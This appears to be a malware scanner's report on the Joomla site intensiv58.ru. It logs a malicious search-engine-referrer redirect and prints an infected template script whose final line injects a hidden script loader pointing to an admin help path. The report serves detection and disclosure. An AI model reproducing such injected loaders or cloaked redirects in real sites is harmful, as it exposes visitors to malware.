Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://intensiv58.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: intensiv58.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 28 Aug 2014 01:03:18 GMT Location: http://www.freeall.epac.to/ Server: Apache Content-Length: 172 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.29 | malicious |
Scanned pages/files
Request | Server response | Status |
http://intensiv58.ru/ | 200 OK Content-Length: 32522 Content-Type: text/html | clean |
http://intensiv58.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://intensiv58.ru/templates/people_final/script.js | 200 OK Content-Length: 6661 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var artEventHelper = { 'bind' : function (obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var artLoadEvent = (function() { var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[ oLI.onmouseleave = function() { this.className = this.className.replace(/menuhover/,""); this.UL.className = this.UL.className.replace(/menuhoverUL/,""); if (this.A) this.A.className = this.A.className.replace(/menuhoverA/,""); }; } } } } artLoadEvent.add(Menu_IE6Setup); ;document.write("<scr"+"ipt src='/administrator/help/en-GB/patrol.js'><"+"/script>");
Antivirus reports:
http://counter.rambler.ru/top100.jcn?2422093 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://intensiv58.ru/index.php?option=com_kunena&Itemid=6 | 200 OK Content-Length: 46418 Content-Type: text/html | clean |
http://intensiv58.ru/components/com_kunena/template/default/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://intensiv58.ru/components/com_kunena/template/default/js/kunenaforum.js | 200 OK Content-Length: 4303 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_joomgallery&Itemid=7 | 200 OK Content-Length: 23227 Content-Type: text/html | clean |
http://intensiv58.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 36830 Content-Type: application/javascript | clean |
http://intensiv58.ru/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15190 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_content&view=category&id=7&Itemid=8 | 200 OK Content-Length: 23735 Content-Type: text/html | clean |
http://intensiv58.ru/index.php?option=com_der&view=der&Itemid=13 | 200 OK Content-Length: 19292 Content-Type: text/html | clean |
http://intensiv58.ru/components/com_der/css/my.js | 200 OK Content-Length: 407 Content-Type: application/javascript | clean |
http://intensiv58.ru/index.php?option=com_content&view=section&layout=blog&id=7&Itemid=21 | 200 OK Content-Length: 26770 Content-Type: text/html | clean |
http://intensiv58.ru/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=2 | 200 OK Content-Length: 26142 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=intensiv58.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://intensiv58.ru/
Result: intensiv58.ru is not infected or malware details are not published yet.